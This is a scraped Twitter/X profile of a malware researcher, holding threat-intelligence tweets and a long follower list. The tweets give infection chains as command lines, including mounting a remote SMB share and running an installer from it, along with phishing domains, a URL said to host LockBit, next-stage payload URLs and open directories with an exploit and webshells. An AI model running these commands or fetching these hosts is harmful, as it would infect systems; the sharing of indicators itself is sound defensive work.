JAMESWT @JAMESWT_MHT
#Independent #Malware #Hunter #CyberSecurity #InfoSec https://t.co/KCFBJcHHcW Joined August 2015-
Tweets50K
-
Followers35K
-
Following419
-
Likes79K
#phishing targeting Italians 🇮🇹 @CosmotownDotCOM pls revoke the domain /aruba-spa.id65200315104.com geoblock restriction from Italy 🇮🇹 @Arubait @ICANN @malwrhunterteam @JAMESWT_MHT @dubstard @YourAnonRiots @andsyn1 @UK_Daniel_Card @BeeHiveCyberSec @Malcoreio @douglasmun
#Latrodectus - .pdf > url > .js > .msi > .dll wscript.exe Document.js msiexec.exe /V MSIBE26.tmp rundll32.exe C:\Users\Admin\AppData\Local\glosar\beta.dll, homq rundll32.exe C:\Users\Admin\AppData\Roaming\Custom_update\Update.dll, homq (1/3) 👇 IOC's github.com/pr0xylife/Latr…
#netsupport #config and #LIC @c_APT_ure rewilivak13.]com:443 greekpool.]com:443 38.180.62[.49 Samples zipped bazaar.abuse.ch/sample/34724a9…
I made an x64 version of Ghidra's PropagateExternalParameters. It adds comments for the parameters. Is not perfect. I just made it work for my use cases. But as I haven't found a similar script, I thought it might still be useful. github.com/struppigel/hed…
#Ransomware #SCATTEREDSPIDER TTPs 1/2🧵 🔥ADExplorer1➡️ view and export Active Directory (AD) data 🔥smbpasswd.py2 ➡️Impacket script to change passwords remotely over Server Message Block (SMB) 🔥Ngrok3 ➡️reverse proxy tool used to create a TCP tunnel to a remote RDP port
Top 10 last week's threats by uploads 🌐 ⬆️ #Phishing 1285 (1192) ⬆️ #Agenttesla 226 (208) ⬆️ #Remcos 164 (127) ⬆️ #Asyncrat 116 (80) ⬆️ #Snake 83 (24) ⬆️ #Hijackloader 72 (51) ⬇️ #Xworm 61 (93) ⬆️ #Njrat 50 (49) ⬆️ #Redline 50 (39) ⬇️ #Dbatloader 45 (53) Track them all at 🔽…
#Lumma Stealer implemented a bot protection system, "pre-trained on screenshots of known virtual machines" 2 months ago. They now claim to have detected 483k bots avoiding 68k "garbage logs", reducing usage of HDDs and helping the world to become cleaner with less CO2 emissions
#APT44 #SHARPIVORY and #ARGUEPATCH samples are uploaded @abuse_ch bazaar.abuse.ch/sample/9ca85bb… bazaar.abuse.ch/sample/1cdca97… @Mandiant Report: services.google.com/fh/files/misc/… UA-CERT Rep: cert.gov.ua/article/6278706 Yara hit: M_Hunting_Dropper_SHARPIVORY_Strings_1 and M_APT_Launcher_ARGUEPATCH_3
@malwrhunterteam @g0njxa @0xToxin @JAMESWT_MHT ➕ "Book_PDF_5435435435.zip": 801c4e8cac66458a94a57e023576bf8c2b92ecf2da6180497700a621830b8ffc Next stages: 1.- https://amazoniasaude[.]com[.]br/tet/become.txt 2.- https://amazoniasaude[.]com[.]br/tet/amazonia.ttt Same C2 as above and also mentioned here x.com/g0njxa/status/……
@malwrhunterteam @g0njxa @0xToxin @JAMESWT_MHT ➕ "Book_PDF_5435435435.zip": 801c4e8cac66458a94a57e023576bf8c2b92ecf2da6180497700a621830b8ffc Next stages: 1.- https://amazoniasaude[.]com[.]br/tet/become.txt 2.- https://amazoniasaude[.]com[.]br/tet/amazonia.ttt Same C2 as above and also mentioned here x.com/g0njxa/status/…… https://t.co/RihWQEPDMt
Anyone remembers when in 2018 we (@JAMESWT_MHT @angel11VR @ClearskySec) found OfflRouter infected documents at/from different places, including the website of the National police of Ukraine? 6 years later (and in 2018 it was already a years old thing), it's "in the news" now. 🤷♂️
Dominio aperto 265giorni Sito fatto male Prezzi troppo bassi P Iva, dati società, privacy inesistente Via Valdo 764 Appartamento 84 San Caligola veneto PG, Italia 31392 Pagamento carta di credito Secondo me ordini e ti fregano al volo la carta di credito
📢 Prossimamente su @ransomfeednews: 1,5 TB di dati (usati) 🇮🇹
💻 Ever wondered how cyber threats disguise themselves to avoid detection? In this article, we explore the intricate techniques of obfuscators such as .NET Reactor and #SmartAssembly. Get ready to explore deobfuscation techniques and create own tools 👇 any.run/cybersecurity-…
#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript Invoice_818493.js wscript out.js C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇 \npp.8.6.3.portable.x64\plugins\mimeTools.dll (1/3) 👇 IOC's github.com/pr0xylife/Wiki…
#SSLoad - #TA578 - url > .js > smb > .msi wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js net use A: \\krd6.]com@80\share\ /persistent:no msiexec.exe /I avp.msi msiexec.exe /V (1/3) 👇 IOC's github.com/pr0xylife/SSLo…
Florian Roth @cyb3rops
180K Followers 2K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇MalwareHunterTeam @malwrhunterteam
219K Followers 36 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.mRr3b00t @UK_Daniel_Card
93K Followers 7K Following 真理的揭露者 Quis custodiet ipsos custodes fella in cyberspace #nafo undercover #FVEY Lovely Horse #fella #meme #farm #appreciator #cyber #specialistBleepingComputer @BleepinComputer
213K Followers 175 Following Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!Germán Fernández @1ZRR4H
29K Followers 575 Following 🏴☠️ OFFENSIVE-INTEL 🏴☠️ Cyber Threat Intelligence by Hackers | Security Researcher en https://t.co/rDrSxZASB3 | @CuratedIntel Member | 🥷🧠🇨🇱Justin Elze @HackingLZ
52K Followers 5K Following Hacker/CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race carsςεяβεяμs - м�.. @c3rb3ru5d3d53c
21K Followers 235 Following 💕 Malware Hunter Killer 💕 #binlex & #mwcfg Developer 📽️ YouTuber 👩💻 She/Her 💍@DravenSwiftbow Support my work 👇 ☕️ https://t.co/SfTI8uJa23Will @BushidoToken
29K Followers 3K Following Threat Intel & Hunting @Equinix | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | @darknetdiaries #126: REvilblackorbird @blackorbird
28K Followers 600 Following Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit Need JobMichael Koczwara @MichalKoczwara
18K Followers 2K Following Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon) https://t.co/vixTz8xKuF https://t.co/VQWaze6gaFKostas @Kostastsale
16K Followers 365 Following @TheDFIRReport member | Tweeting and following mostly #ThreatIntel,#malware,#IR & #Threat_Hunting. Opinions are mine only! 🇬🇷🇨🇦Max_Malyutin @Max_Mal_
11K Followers 302 Following Threat Researcher, Blue Team, DFIR, Malware Analysis, and Reverse Engineering. “⚔️What do we say to God of malware, Not today⚔️”Ali Hadi | B!n@ry @binaryz0ne
29K Followers 567 Following DFIR and Adversary Simulation | DFIR @ ProtonMail | Perfect Stranger | Stronger Together |Karsten Hahn @struppigel
22K Followers 702 Following Malware Researcher at G DATA. Ransomware hunter. he/him 🦔🌈🏳️⚧️Thomas Roccia 🤘 @fr0gger_
25K Followers 2K Following Sr. Threat Researcher @Microsoft, Malware Warlock, Threat Intel, Python🧡- Former @McAfee_labs, Goon @Defcon, Creator of #UnprotectProject - Tweets are my ownJames @James_inthe_box
21K Followers 438 FollowingSentinelOne @SentinelOne
52K Followers 1K Following ONE autonomous platform to prevent, detect, respond, and hunt. Do more, save time, secure your enterprise: https://t.co/N75g1HAnCs 🐱💻hasherezade @hasherezade
84K Followers 845 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)Goober 🥜 @_DrGoober_
1 Followers 519 Following 🏜️ I don't know what to put here. Everything is in my Carrd lmao 🏜️ ✨ Profile Picture: @kisaartdealerOfek @B1ue6uy
4 Followers 234 FollowingMOHAMED-AMINE EL-FAKI.. @Cyberwallx
1 Followers 138 Following SOC Analyst & Cybersecurity Researcher🛡️ Cyberwallx!Guilherme Ausechi @GAusechi
55 Followers 542 FollowingRodrigo Rios 🇧🇷 @Rodrigofrj
39 Followers 643 Following O sábio nunca diz tudo o que pensa, mas pensa sempre tudo o que diz. Aristóteles.Sec Code Hub @seccodehub
1 Followers 38 Followingofek la @ofek_la
4 Followers 141 Following0x99980rm45 @Init91
7 Followers 726 FollowingSilver Wolf @An_Old_Wolf
576 Followers 2K Following live big... and always leave this place better than how you found it.Lawal Mtw 🇳🇬 | .. @lawal_mtw
800 Followers 3K Following Muslim🕌 I 🤍 Technology Immediate follow back 💯cscfufo @cscfufo
28 Followers 2K FollowingBeastie @bonzo_beasley
133 Followers 1K FollowingSmart Cherrys Tech @smartcherrystc
9K Followers 6K Following Smart Cherrys Tech is Technology World.Rabbit @Red_Rabbit4440
25 Followers 823 FollowingSergio @SergioBa88
5 Followers 38 FollowingAdam @Jeager7
92 Followers 1K FollowingSaykQ @saykq27393237
13 Followers 105 Following root@saykq:~$ rm -rf /home/saykq/nice yıllar boyu kırmış kalbini/*Thanks Always @iTimonPumbaa
9 Followers 367 FollowingJohn Grageda @DrTerdnugget
5 Followers 29 FollowingLunis3009 @lunis3009
1 Followers 174 FollowingHacker Ransomware @HackerR93723
2 Followers 14 FollowingAbdulrahman @slyfer___
284 Followers 2K Following Muslim | wannabe a Red Teamer | 🇵🇸 | Biggest fan @ManUtd & @UFC ..LOTRGuardbit @guard__bit
13 Followers 125 Following Your Trusted Cybersecurity Partner. Join us in securing every click, every swipe, and every interaction. #GuardBit #CyberSecuritysimone.helena87@gmail.. @Helena87Simone
0 Followers 203 FollowingFhutt Wonnsp @w264481hh
42 Followers 514 FollowingElectronicsseeker @libertarian108
23 Followers 2K FollowingDonMonkei @KontraSkynet
22 Followers 557 FollowingMicrominder Cyber Sec.. @MicrominderS
27 Followers 307 Following A premium holistic cyber security services provider on a mission to simplify cyber security.Sad-Sky @SadSky29182203
37 Followers 1K FollowingMarc @snavemarc
2K Followers 5K Following Nerd. Interests: Tech, Privacy, Cybersecurity. Developer. Dating the delightful @Katelouise23981 PGP: https://t.co/dti1RPc5d0Vlad @Vlad2026421
1 Followers 10 FollowingFernando Manzanarez @FernandoMa61306
8 Followers 122 FollowingFlorian Roth @cyb3rops
180K Followers 2K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇MalwareHunterTeam @malwrhunterteam
219K Followers 36 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.mRr3b00t @UK_Daniel_Card
93K Followers 7K Following 真理的揭露者 Quis custodiet ipsos custodes fella in cyberspace #nafo undercover #FVEY Lovely Horse #fella #meme #farm #appreciator #cyber #specialistNicolas Krassas @Dinosn
122K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3BleepingComputer @BleepinComputer
213K Followers 175 Following Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!Germán Fernández @1ZRR4H
29K Followers 575 Following 🏴☠️ OFFENSIVE-INTEL 🏴☠️ Cyber Threat Intelligence by Hackers | Security Researcher en https://t.co/rDrSxZASB3 | @CuratedIntel Member | 🥷🧠🇨🇱Unit 42 @Unit42_Intel
51K Followers 88 Following The latest research and news from Unit 42, the Palo Alto Networks (@paloaltontwks) Threat Intelligence and Security Consulting Team covering incident response.ςεяβεяμs - м�.. @c3rb3ru5d3d53c
21K Followers 235 Following 💕 Malware Hunter Killer 💕 #binlex & #mwcfg Developer 📽️ YouTuber 👩💻 She/Her 💍@DravenSwiftbow Support my work 👇 ☕️ https://t.co/SfTI8uJa23Will @BushidoToken
29K Followers 3K Following Threat Intel & Hunting @Equinix | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | @darknetdiaries #126: REvilblackorbird @blackorbird
28K Followers 600 Following Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit Need JobMichael Koczwara @MichalKoczwara
18K Followers 2K Following Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon) https://t.co/vixTz8xKuF https://t.co/VQWaze6gaFKostas @Kostastsale
16K Followers 365 Following @TheDFIRReport member | Tweeting and following mostly #ThreatIntel,#malware,#IR & #Threat_Hunting. Opinions are mine only! 🇬🇷🇨🇦Max_Malyutin @Max_Mal_
11K Followers 302 Following Threat Researcher, Blue Team, DFIR, Malware Analysis, and Reverse Engineering. “⚔️What do we say to God of malware, Not today⚔️”Karsten Hahn @struppigel
22K Followers 702 Following Malware Researcher at G DATA. Ransomware hunter. he/him 🦔🌈🏳️⚧️James @James_inthe_box
21K Followers 438 FollowingThe DFIR Report @TheDFIRReport
53K Followers 0 Following Real Intrusions by Real Attackers, the Truth Behind the Intrusion. Services: https://t.co/XW613EKt2wESET Research @ESETresearch
32K Followers 30 Following Security research and breaking news straight from ESET Research Labs.hasherezade @hasherezade
84K Followers 845 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)Gi7w0rm @Gi7w0rm
14K Followers 680 Following Threat Intelligence and #URINT Analyst | See my Linktree for other socials | In case I post false intel, contact me! Support me: https://t.co/5WgDqr0K8pDavide Sbisà @Audiocostruzion
179 Followers 0 Followingpetikvx @petikvx
3K Followers 647 Following Malware Researcher Collecter - All my samples will be on https://t.co/ifIYiMAyVdCyber Team @Cyberteam008
920 Followers 50 Following Threat Hunting | APT Tracking | Malware Analysis | Darkweb Monitoring "Unity is Strength"AzAl Security @azalsecurity
2K Followers 193 Following dedicated deluge of strikes https://t.co/zgfADTtsYiJohn Fokker @John_Fokker
3K Followers 687 Following Head of Threat Intelligence @TrellixArc➖ Former @McAfee, @politiethtc & @korpsmariniers ➖ Likes lifting heavy stuff fast➖ Opinions are my own.Max 'Libra' Kersten @Libranalysis
3K Followers 350 Following Malware analyst and reverse engineer, author of the Binary Analysis Course. DMs are always open. Opinions are my own and not the views of my employer.Ryan "Chaps" Chapman @rj_chap
7K Followers 3K Following DFIR & malware analyst. @sansforensics FOR528 Author & FOR610 Instructor. @CactusCon crew. Husband & father. Comments = own.Garante Privacy @GPDP_IT
11K Followers 140 Following Garante per la Protezione dei Dati Personali | Italian Data Protection Authority Official Account | Social Media Policy https://t.co/JlDq1T6DicShanholo @ShanHolo
384 Followers 456 Following Another blue team member…..#DFIR #Malware #C2C #ShooterGames #Crossfit #Snowboarding #Motorbikes #FoodPorn and following the white rabbit...ransomfeednews @ransomfeednews
1K Followers 30 Following Ransomfeed empowers businesses and individuals with #datadriven insights on #ransomware threats | #ransomfeedC2IntelFeedsBot @drb_ra
4K Followers 0 Following Mostly here for posting C2s. Thank you to @censysio for the raw data. Censys Search 2.0 extended our results massively.TEAM CYMRU @teamcymru
42K Followers 190 Following We provide digital business risk platforms and community services. Since 2005, our reputation has remained unchallenged Check out our research @teamcymru_S2!Robert Vroofdown @OSINT_with_bord
530 Followers 45 Following Hello, community, I created this channel to cover information leaks and various tricky tools that I use myself, write to me!Autumn Good @autumn_good_35
6K Followers 369 Following 晴れ時々セキュリティ、所により一時スイーツ。 セキュリティは趣味ですけど仕事にも活かしていきたいですね。Security Hobbyist. Ice Cream Researcher. 日本アイスマニア協会会員Dominic Alvieri @AlvieriD
14K Followers 292 Following Cybersecurity analyst and security researcher. Deleted my own Facebook & hacked yours. #cybersecurity #infosec https://t.co/jpm0COr5fYDaniel(a) @_ChezDaniela
2K Followers 5K Following Somewhere in between foodie, wine lover and security geek 💛 Python 💙|Personal tweets|GSNA/GPEN/GCFR | cancer survivorMert Değirmenci @r00tten
331 Followers 679 Following Security Researcher (GReAT) | Coffee enthusiast | Creator of MALWARE-ATLAS.allthingsoneplace @allthingsonepl1
136 Followers 5 Following Electronics, Computers, Projects, Builds, and more are what you will find here.Karol Paciorek @karol_paciorek
1K Followers 279 Following 🎯 Cybersecurity enthusiast, focused on CTI and threat hunting. 🛡️ Member of @CSIRT_KNFGraham Cluley @gcluley
113K Followers 2K Following Award-winning cybersecurity keynote speaker, writer, podcaster | Co-host of "Smashing Security" podcast @SmashinSecurity | 🐘 https://t.co/LbjAKHahyPShadow0pz 𝕏 @Shadow0pz
7K Followers 3K Following A.I. | Datacenters | Father | Son | Friend | Builder | Dogs | Fmr: CoreWeave, BishopFox, Westinghouse Nuke, Microsoft Red Badge,+Spamhaus Technology @SpamhausTech
4K Followers 77 Following Spamhaus is the trusted authority on IP and domain reputation. This data not only protects but also provides insight across networks and email worldwide.The real Boinc Italy .. @TheBoinc
437 Followers 586 Following Il gruppo italiano di supporto alla ricerca scientifica attraverso la piattaforma BOINC. Biggest italian group supporting BOINC.David Guimarães @skysbsb
209 Followers 2K Following0xor0ne @0xor0ne
55K Followers 526 Following | CyberSecurity | Reverse Engineering | C and Rust | Exploit | Linux kernel | PhD | My Tweets, My Opinions :) |Edoardo Limone 🇮�.. @elimone
2K Followers 160 Following Cyber Security Consultant email: [email protected]Who said what @g0njxa
2K Followers 187 Following qui fa lo que pot no esta obligat a mes | objetivo 2028 | Bad Student, enthusiast, more likely than an expert DMs are open, feel free to reach! 😼☂️🟣🍇👾Fox_threatintel @banthisguy9349
7K Followers 157 Following Just a person who is against cyber crime.Sergey Lozhkin @61ack1ynx
1K Followers 455 Following Principal Security Researcher at @kaspersky Global Research and Analysis Teamalinghiredbullracing @alinghiredbull
2K Followers 34 Following Professional Swiss Sailing Team 🇨🇭 Official Challenger for the 37th @americascup in Barcelona, Spain 🇪🇸 Representing @snggeneveAl ツ @viuleeenz
188 Followers 220 Following Reverse Engineer & Malware Analyst @Cleafy | Threat Hunting | Threat IntelCleafy LABS @cleafylabs
214 Followers 0 Following Threat intelligence analyses and breaking news straight from Cleafy LabsMarcelo Rivero @MarceloRivero
5K Followers 254 Following Sr. Malware Research Lead @Malwarebytes | Focusing on macOS/Linux Threats & Ransomware Tracking | Founder @InfoSpyware | Ex-Microsoft MVP | #ThreatIntel 🌐Branislav Styk @Branislav_Styk
304 Followers 610 Following Technology • Science • Strategy • Product Management • Cyber Security & PrivacySimplicio Liberatore @br0pi
143 Followers 985 Following Malware Analyst | GREM | Zero2Auto | IT Engineer with Cyber Security passion | Linux Lover | CTF player | Metro Olografix memberAgenzia Entrate @Agenzia_Entrate
67K Followers 83 Following Account ufficiale dell’Agenzia delle EntrateMarius 'f0wL' Genheim.. @f0wlsec
3K Followers 2K Following Malware REsearch/DFIR @SI_FalconTeam | Staff @vxunderground (Malware & APT Curation) | @chaosdarmstadt | @[email protected]If you've been monitoring that #phorpiex "Your Document" with document\.zip from Jenny @ gsd . com, it's now dropping #lockbit hosted at: http:// 193.233 .132 .177/lbb.exe app.any.run/tasks/206f3ae9…
People like @cocaman are heroes that do not wear capes. I have seen him share several Lockbit samples to bazar from @abuse_ch and many other samples. Considering that he swiss and user ''5'' he must know @abuse_ch in real life right??? 🥹🤣😎 bazaar.abuse.ch/user/5/
#Phishing @Zimbra 🎯🇮🇹 Form login POST https ://wehaveitsure.ro/b-newlevel-1/uutyrtrreer/tttggg.php 🔎 urlscan.io/result/a541e9f…
Pubblicato un presunto #DataBreach Croce Rossa Italiana. Lo segnalo solo per via di un comunicato di Febbraio 2024 della @crocerossa: cri.it/2024/02/06/att… Dai sample pubblicati, emerge, infatti, una incongruenza che fa pensare non si tratti di un DataBreach recente. Cc/…
La primavera (o autunno distopico) porta sempre con sé colazioni all'aperto e le storie di chi ti siede vicino. Milano ha questo mood, da sempre, tra autoctoni con bulldog al guinzaglio e pipa rossa in bocca e forestieri con cuffie giganti e ninnoli penzoloni alle giacche. I…
🚨#Opendir #AgentTesla 🚨 everywhere 🤦♂️ http://198.12.81[.139/2020/ 🔥CLC.exe ➡️ MD5:977177ff7930860f4f208ebe1fc68675 41/71 VT
#opendir #CVE20243273 #LinkNas 45.67.230.198:8000 exploit.]py - file with the exploit of CVE-2024-3273 (D-Link NAS devices Remote Code Execution); http_urls.lst - list of potencial vulnerable hosts file_chk.php - WebShell
#opendir #backdoors #malware #shellcode 154[.]40[.]47[.]195[:]9000 8989.elf - [shellcode]:Linux exploit.bin - CVE-2021-3490 ssh_snake.sh - Trojan.Sshsnake wp.elf - [shellcode]:Linux wlfmon.elf - [shellcode]:Linux
#opendir full with interesting malware! 148.135.35.177:3389 Meterpreter on 148.135.35.177:80 148.135.35.177:90 cc: @abuse_ch @tosscoinwitcher @500mk500 @Gi7w0rm
@namesilo pls revoke the #phishing domain /it-postjtmpg.top/postg geoblock restriction from Italy 🇮🇹 @ICANN @ICANN_president @malwrhunterteam @JAMESWT_MHT @dubstard @YourAnonRiots @andsyn1 @UK_Daniel_Card @BeeHiveCyberSec @Malcoreio @douglasmun
#phishing targeting Italians 🇮🇹 @CosmotownDotCOM pls revoke the domain /aruba-spa.id65200315104.com geoblock restriction from Italy 🇮🇹 @Arubait @ICANN @malwrhunterteam @JAMESWT_MHT @dubstard @YourAnonRiots @andsyn1 @UK_Daniel_Card @BeeHiveCyberSec @Malcoreio @douglasmun
#Latrodectus - .pdf > url > .js > .msi > .dll wscript.exe Document.js msiexec.exe /V MSIBE26.tmp rundll32.exe C:\Users\Admin\AppData\Local\glosar\beta.dll, homq rundll32.exe C:\Users\Admin\AppData\Roaming\Custom_update\Update.dll, homq (1/3) 👇 IOC's github.com/pr0xylife/Latr…
I put the domain in the text message posted by @techstarsrk into Validin and in about 30 seconds found 6,588 additional recently-active smishing domains. Full list here: pastebin.com/nKxMGHgG
After my Brother’s iPhone 14 got stolen. His friend received a message stating that his iPhone has been found. A link was given which took him to the find device website. It asked for the Lockscreen pin that was set on stolen iphone. Only thing is, Its a Fake Fraud Website.👇
Additional @WSJ imitation domain, shares IP with wsj[.]pm: wsj[.]re Other to check, recently hosting similar HTML content - 40+ other domains: wsj.webserve.workers[.]dev fl.samsungshopify[.]ir www.finacial.patrickring[.]net See full list here: pastebin.com/NVVwt8m1